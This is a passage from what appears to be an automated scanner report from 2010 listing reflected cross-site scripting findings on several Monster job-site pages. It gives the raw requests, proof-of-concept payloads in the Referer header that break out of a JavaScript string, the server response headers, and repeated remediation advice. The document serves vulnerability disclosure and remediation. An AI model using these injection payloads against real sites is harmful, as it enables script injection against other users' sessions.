Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6d99f'-alert(1)-'b72d8e5a7e0
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:27 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=agskkj5503o4x155ljcst155; path=/; HttpOnly Set-Cookie: split_scsjsv=89; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:27 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=89; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:27 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:27 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:27 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 103124 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86afd'-alert(1)-'b9a8cac39fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Become-Member/Create-Account.aspx HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=86afd'-alert(1)-'b9a8cac39fd
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:08 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=giiali55ysywch55nxh4ib55; path=/; HttpOnly Set-Cookie: split_scsjsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:08 GMT; path=/ Set-Cookie: scsjsv=1; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:08 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:08 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:08 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 53016 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa48'-alert(1)-'84dd028eadb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Career-Assessment/Dashboard.aspx HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=faa48'-alert(1)-'84dd028eadb
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:56 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qsbszxftxn0sppufqxseyjfd; path=/; HttpOnly Set-Cookie: bmid=3451423; path=/ Set-Cookie: split_scsjsv=71; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:56 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=71; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:56 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:56 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:56 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 146298 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cdb'-alert(1)-'42557873a4a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Career-Management/Landing.aspx HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c7cdb'-alert(1)-'42557873a4a
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:36 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=jbgjvzqauvgx4a55ayshdo45; path=/; HttpOnly Set-Cookie: split_scsjsv=64; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:35 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=64; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:35 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:35 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:35 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 122445 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f9c1'-alert(1)-'72544dcd3e3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ContactUs.aspx HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2f9c1'-alert(1)-'72544dcd3e3
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:00 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=popnynm5wphkxkveplhx0czz; path=/; HttpOnly Set-Cookie: split_scsjsv=50; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:00 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=50; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:00 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:00 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:00 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 54458 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 180b5'-alert(1)-'89bbab2ae9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Job-Profiles/GetProfile.aspx HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=180b5'-alert(1)-'89bbab2ae9
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:51:33 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=0luabcrnk41en245hvkwyonq; path=/; HttpOnly Set-Cookie: split_scsjsv=72; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:51:04 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=72; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:51:04 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:51:33 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:51:33 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 111074 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a54d'-alert(1)-'1fb39391664 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contactus/ HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6a54d'-alert(1)-'1fb39391664
Response (redirected)
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:53 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=orrhblftx5aqtpqo4elkjgnn; path=/; HttpOnly Set-Cookie: split_scsjsv=14; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:53 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=14; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:53 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:53 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:53 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 54458 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50046'-alert(1)-'3535f138ba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/default.aspx HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=50046'-alert(1)-'3535f138ba
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:48 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wsmgkj45ckman2uz350u4c45; path=/; HttpOnly Set-Cookie: split_scsjsv=8; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:48 GMT; path=/ Set-Cookie: scsjsv=1; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=8; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:48 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:48 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:48 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 44795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c3c7'-alert(1)-'14356df9d67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6c3c7'-alert(1)-'14356df9d67
Response (redirected)
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:49:38 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=j4mgazel4g0xnlvobihcc045; path=/; HttpOnly Set-Cookie: split_scsjsv=33; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:49:38 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=33; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:49:38 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:38 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:38 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 90374 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53d4b'-alert(1)-'0633da32c97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /securitycenter/ HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=53d4b'-alert(1)-'0633da32c97
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:47:55 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=u2hg0r45jyy30izyh1x1vf2v; path=/; HttpOnly Set-Cookie: split_scsjsv=92; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:47:55 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=92; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:47:55 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:47:55 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:47:55 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 122104 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba015'-alert(1)-'c903e6242a1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ba015'-alert(1)-'c903e6242a1
Response (redirected)
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:52 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=bwk5z5rzclawtz55g4pfpezr; path=/; HttpOnly Set-Cookie: split_scsjsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:52 GMT; path=/ Set-Cookie: scsjsv=1; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:52 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:52 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:52 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 95194 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42524'-alert(1)-'3c402c49615 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms/default.aspx HTTP/1.1 Host: my.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=42524'-alert(1)-'3c402c49615
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:54 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=h4yo4ezhbmcisria5ca2jw55; path=/; HttpOnly Set-Cookie: split_scsjsv=41; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:54 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=41; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:54 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:54 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:54 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 107174 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 976a5'-alert(1)-'b5ef0d27bc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: offres.monster.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=976a5'-alert(1)-'b5ef0d27bc7
Response
